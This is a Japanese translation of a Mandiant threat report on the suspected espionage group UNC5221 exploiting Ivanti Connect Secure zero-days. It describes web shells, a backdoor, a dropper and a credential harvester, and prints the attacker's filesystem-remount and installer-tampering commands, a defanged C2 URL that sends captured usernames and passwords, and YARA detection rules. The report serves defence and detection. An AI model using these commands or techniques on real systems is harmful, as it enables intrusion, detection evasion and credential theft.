最先端の脅威: APTと疑われるグループ、 新たなゼロデイ攻撃でIvanti Connect Secure VPNを標的に
Mandiant
※この投稿は米国時間 2024 年 1 月 11 日に、Google Cloud blog に投稿されたものの抄訳です。
注:本件は、現在MandiantとIvantiが積極的に分析を行っている、進行中の脅威活動です。今後も必要に応じて、このブログ記事に指標、検出、情報を随時追加していきます。
2024年1月10日、 IvantiはIvanti Connect Secure VPN(旧Pulse Secure以下、「CS」)およびIvanti Policy Secure(以下、「PS」)アプライアンスに影響を与える2つのゼロデイ脆弱性に関する情報(CVE-2023-46805およびCVE-2024-21887)を公開しました。この脆弱性が悪用されると、認証の回避やコマンド インジェクションが可能になり、被害組織内ネットワークのダウンストリームでのさらなる侵害につながる可能性があります。Mandiantは、スパイ活動が疑われる脅威グループ(現在UNC5221として追跡中)が、早ければ2023年12月からこれら脆弱性を悪用したゼロデイ攻撃を行っていることを特定しています。
Ivantiは、Mandiantのほか、影響を受ける顧客、政府機関のパートナーや、Volexityと緊密に連携して、これらの問題に対処しています。調査の一環として、Ivantiはゼロデイ攻撃脆弱性に関するブログ記事と緩和策を公開しており、これはシステムが影響を受けているかどうかを判断するのに役立ちます。修正パッチは現在開発中であり、Ivantiのお客様は技術情報を記したKBの記事に基づき、パッチリリースが提供予定日や最新情報を入手することが推奨されています。
Mandiantは、CSおよびPSデバイスの悪用に関連する5つのマルウェアファミリの詳細を共有しています。これらのファミリは、攻撃者が認証を回避し、デバイスにバックドアアクセスを提供することを可能にします。調査で特定された、脆弱性悪用後の追加ツールについても、このブログでさらに詳しく説明しています。
脆弱性悪用後のアクティビティ
UNC5221は、CVE-2023-46805(認証バイパス)およびCVE-2024-21887(コマンド インジェクション)の悪用に成功した後、複数のカスタムマルウェアファミリを利用し、いくつかのケースでCS内の正規のファイルを悪意のあるコードでトロイの木馬化しました。 UNC5221はまた、PySoxy(ピソクシー)トンネラーとBusyBoxを利用して、悪用後のアクティビティを有効にすることも観察されました。
デバイスの特定のセクションが読み取り専用であるため、UNC5221はPerlスクリプト (sessionserver.pl) を利用してファイルシステムを 読み取り/書き込み として再マウントし、Webシェル LIGHTWIRE を正規のConnect Secureファイルに書き込むシェルスクリプトドロッパーであるTHINSPOOLや、その他の後続ツールを展開できるようにしました。セキュアファイルおよびその他の後続ツールを接続します。
use lib ($ENV{'DSINSTALL'} =~ /(\S*)/)[0] . "/perl";
use DSSafe;
system("mount -o remount,rw /");
system("chmod a+x /home/etc/sql/dsserver/sessionserver.sh");
system("/home/etc/sql/dsserver/sessionserver.sh 1>/dev/null 2>/tmp/errlog");
system("mount -o remount,ro /");
カスタムマルウェアの識別
ZIPLINE パッシブバックドア
ZIPLINEは、ファイルlibsecure.soからエクスポートされた関数accept()を乗っ取るパッシブバックドアです。ZIPLINEがハイジャックされたaccept()関数を呼び出すと、まずlibcから通常のaccept()を解決して、ネットワークトラフィックを傍受します。外部接続が登録されると、まず通常のlibc_acceptによって処理され、ZIPLINEはプロセス名が「web」であるかどうかを確認します。マルウェアは、接続されたホストから最大21バイトを取得し、受信したバッファが文字列「SSH-2.0-OpenSSH_0.3xx」に対応しているかどうかを確認します。 その場合、ZIPLINEの悪意のある機能がトリガーされます。ZIPLINEはその後、実行するコマンドを指定する暗号化されたヘッダーを受け取ります。accept() 関数のこの乗っ取り手法の詳細については、SecureIdeasの投稿をご確認ください。
ZIPLINEは、次のコマンドをサポートしています。
初期化時に、ZIPLINEは /etc/ld.so.preload
を /tmp/data/root/etc/ld.so.preload
にコピーします。これは、プロセス名が "dspkginstall" の場合に実行されます。その後、ZIPLINEは自身を /tmp/data/root/home/lib
にコピーします。
ZIPLINEは終了時に、まずプロセス名が tar であるかどうかを確認します。プロセス名がtarの場合、マルウェアは指定されたパラメータ(-xzf
、--exclude
、または./installer
.)に基づいてさまざまな機能を実行します。
パラメータ --exclude
を使用すると、ZIPLINE は自身を CS exclusion_list
.に追加します。このexclusion_listはIvanti Integrity Checker Toolの一部であり、Mandiantはこれが検出を回避するために実装した手段であると評価しています。
パラメータ -xzf
が使用されている場合、ZIPLINE は独自の SHA256 ハッシュを計算し、行 <sha256> ./root<self_fpath>
をフォーマットしてから、この文字列を ./installer/bom_files
ディレクトリ内の各ファイルに追加します。これは、コマンドecho <formatted_sha256_string> >> ./installer/bom_files/<file_name>
を使用して実現されます。
パラメータ ./installe
が使用されている場合、ZIPLINE は /pkg/do-install
と ./installer/do-install
から特定の行を削除します。これを行うには、次の sed
コマンドを実行します。
sed -i '/retval=$(exec $installer $@)/d' /pkg/do-install
sed -i '/exit $?/d' /pkg/do-install
sed -i '/retval=$(exec $installer $@)/d' ./installer/do-install
sed -i '/exit $?/d' ./installer/do-install
THINSPOOL ドロッパー
THINSPOOLは、WebシェルLIGHTWIREを正規のCSファイルに書き込むシェルスクリプトで記述されたドロッパーです。THINSPOOLは、アップデート後に悪意のあるWebシェルコードを正規のファイルに再度追加し、侵害されたデバイス上でUNC5221を存続させます。THINSPOOLはIvantiのインテグリティチェッカーを回避しようとしましたが、Mandiantはこの試みが失敗したことを確認しました。
LIGHTWIRE および WIREFIRE Web シェル
LIGHTWIREはPerl CGIで記述されたWebシェルで、正規のSecure Connectファイルに埋め込まれ、任意のコマンドの実行を可能にします。LIGHTWIRE は、パラメータ "comp=comp
" と "compid
" を含む compcheckresult.cgi
へのリクエストを妨害します。"compid
" にはBase64でエンコードされ、RC4 で暗号化された暗号文が含まれます。デコードされた平文は、Perl コードとして解釈され、実行されます。
WIREFIREは、Pythonで記述されたWebシェルで、Connect Secureアプライアンスのコンポーネントに対するトロイの木馬化されたロジックとして存在します。WIREFIREは、侵害されたデバイスへのファイルのダウンロードと任意のコマンドの実行をサポートします。これには、/api/v1/cav/client/visits
.への特定の HTTP POST 要求に応答する認証前に挿入されるロジックが含まれています。フォームデータエントリ「file
」が存在する場合、Webシェルは指定されたファイル名でコンテンツをデバイスに保存します。そうでない場合、Webシェルはサブプロセスとして実行するために、GIFヘッダーの後に存在する生データのデコード、復号化、zlib解凍を試みようとします。実行されたプロセスの出力は、zlib 圧縮され、同じキーで AES 暗号化され、Base64でエンコードされた後、HTTP 200 OKを介して"message
"フィールドを含むJSONとして返送されます。
WARPWIRE クレデンシャルハーベスター
WARPWIREは、Javascriptで記述されたクレデンシャルハーベスタで、正規のConnect Secureファイルに埋め込まれています。WARPWIREは、HTTP GETリクエストを介してコマンド&コントロール(C2)サーバーに送信される平文のパスワードとユーザー名を標的としています。
WARPWIRE は、RDP などのレイヤー7アプリケーションにアクセスするため、Webログオン中に送信された認証情報をキャプチャします。キャプチャされた認証情報は、HTTP GETリクエスト経由でC2に送信される前に、btoa()
でBase64エンコードされます。
hxxps://symantke[.]com/?<username>&<password>
アトリビューション
本稿執筆時点では、Mandiantはこの活動を既知のグループと関連付けておらず、この攻撃者の起源を評価するのに十分なデータがありません。UNC5221は、このスパイ活動を行う攻撃者を追跡するために作成されました。ゼロデイ脆弱性を持つエッジインフラを標的にすることは、スパイ活動を行う攻撃者が利用する一貫した戦術です。さらに、Mandiantは以前にも複数のAPTと疑われる攻撃者が、アプライアンス固有のマルウェアを利用して脆弱性悪用後の攻撃を可能にし、検出を回避していることを観測しています。これらの事例と、ターゲティングに関するVolexityの調査結果を組み合わせると、Mandiantはこれがスパイ行為に動機づけられたAPTキャンペーンである可能性があると考えています。
UNC5221は主に侵害されたサポート切れのCyberoam VPNアプライアンスをC2に使用していました。これらの侵害されたデバイスは被害者のものであったため、攻撃者は検出をより適切に回避するのに役立った可能性があります。
結論と推奨事項
UNC5221の活動は、ネットワークエッジを標的にすることが、依然としてスパイ活動者にとって実行可能かつ魅力的な目標であることを示しています。以前報告したように、ゼロデイ悪用、エッジデバイスの侵害、侵害されたC2インフラストラクチャの使用、正規ファイルにコードを書き込むなどの検出回避方法の組み合わせは、スパイ活動で頻繁に用いられるツールボックスの特徴となっています。
このアクティビティに関するIvantiブログ記事に記載されているガイダンスに従うことをお勧めします。Ivantiを使用している組織は、できるだけ早く緩和策を実装し、今後のパッチリリーススケジュールについての投稿に従うことが推奨されます。Ivantiの整合性チェッカーツール(ICT)の詳細もご覧ください。
謝 辞
本調査におけるIvantiのチームのパートナーシップとサポートに深く感謝します。また本分析は、Mandiant Intelligence、Consulting、FLAREチーム、そしてGoogle TAGの同僚のサポートなしには不可能でした。特に本調査に協力いただいたMandiantのAdversary Methods Research and Discovery(RAD)チームのAseel Kayal氏とNick Simonian氏に感謝の意をここに表します。
Indicators of Compromise (IOCs)
Network-Based Indicators (NBIs)
YARA Rule
rule M_Hunting_Dropper_WIREFIRE_1 {
meta:
author = "Mandiant"
description = "This rule detects WIREFIRE, a web shell written in Python that exists as trojanized logic to a component of the pulse secure appliance."
md5 = "6de651357a15efd01db4e658249d4981"
strings:
$s1 = "zlib.decompress(aes.decrypt(base64.b64decode(" ascii
$s2 = "aes.encrypt(t+('\\x00'*(16-len(t)%16))" ascii
$s3 = "Handles DELETE request to delete an existing visits data." ascii
$s4 = "request.data.decode().startswith('GIF'):" ascii
$s5 = "Utils.api_log_admin" ascii
condition:
filesize < 10KB
and all of them
}
rule M_Hunting_Webshell_LIGHTWIRE_2 {
meta:
author = "Mandiant"
description = "Detects LIGHTWIRE based on the RC4
decoding and execution 1-liner."
md5 = "3d97f55a03ceb4f71671aa2ecf5b24e9"
strings:
$re1 = /eval\{my.{1,20}Crypt::RC4->new\(\".{1,50}->RC4\
(decode_base64\(CGI::param\(\'.{1,30};eval\s\$.{1,30}\"Compatibility
\scheck:\s\$@\";\}/
condition:
filesize < 10KB
and all of them
}
rule M_Hunting_Dropper_THINSPOOL_1 {
meta:
author = "Mandiant"
description = "This rule detects THINSPOOL, a dropper that
installs the LIGHTWIRE web shell onto a Pulse Secure system."
md5 = "677c1aa6e2503b56fe13e1568a814754"
strings:
$s1 = "/tmp/qactg/" ascii
$s2 = "echo '/home/config/dscommands'" ascii
$s3 = "echo '/home/perl/DSLogConfig.pm'" ascii
$s4 = "ADM20447" ascii
condition:
filesize < 10KB
and all of them
}
rule M_Hunting_CredTheft_WARPWIRE_1
{
meta:
author = "Mandiant"
description = "This rule detects WARPWIRE, a credential stealer
written in Javascript that is embedded into a legitimate Pulse Secure file."
md5 = "d0c7a334a4d9dcd3c6335ae13bee59ea"
strings:
$s1 = {76 61 72 20 77 64 61 74 61 20 3d 20 64 6f 63 75 6d 65 6e
74 2e 66 72 6d 4c 6f 67 69 6e 2e 75 73 65 72 6e 61 6d 65 2e 76 61 6c 75 65 3b}
$s2 = {76 61 72 20 73 64 61 74 61 20 3d 20 64 6f 63 75 6d 65 6e
74 2e 66 72 6d 4c 6f 67 69 6e 2e 70 61 73 73 77 6f 72 64 2e 76 61 6c 75 65 3b}
$s3 = {2b 77 64 61 74 61 2b 27 26 27 2b 73 64 61 74 61 3b}
$s4 = {76 61 72 20 78 68 72 20 3d 20 6e 65 77 20 58 4d 4c 48
74 74 70 52 65 71 75 65 73 74}
$s5 = "Remember the last selected auth realm for 30 days" ascii
condition:
filesize < 8KB and
all of them
}
-Mandiant, 作成者: Tyler McLellan, John Wolfram, Gabby Roncone, Matt Lin, Robert Wallace, Dimiter Andonov